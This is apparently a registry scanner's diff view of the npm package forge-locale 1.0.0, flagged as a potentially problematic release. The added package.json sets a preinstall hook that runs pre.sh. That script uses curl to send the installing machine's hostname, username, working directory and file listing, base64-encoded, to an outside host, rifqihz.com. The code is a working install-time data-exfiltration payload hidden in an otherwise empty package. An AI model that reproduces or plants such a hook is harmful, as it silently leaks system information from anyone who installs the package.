forge-locale 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of forge-locale might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +13 -0
  2. package/pre.sh +3 -0
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+
2
+ {
3
+ "name": "forge-locale",
4
+ "version": "1.0.0",
5
+ "description": "",
6
+ "main":"index.js",
7
+ "scripts": {
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall": "./pre.sh"
10
+ },
11
+ "author": "v0id1",
12
+ "license": "ISC"
13
+ }
package/pre.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl http://rifqihz.com/poc -A "Hostname: $(hostname | base64) Whoami: $(whoami | base64) Pwd: $(pwd | base64) Data: $(ls -a | base64)"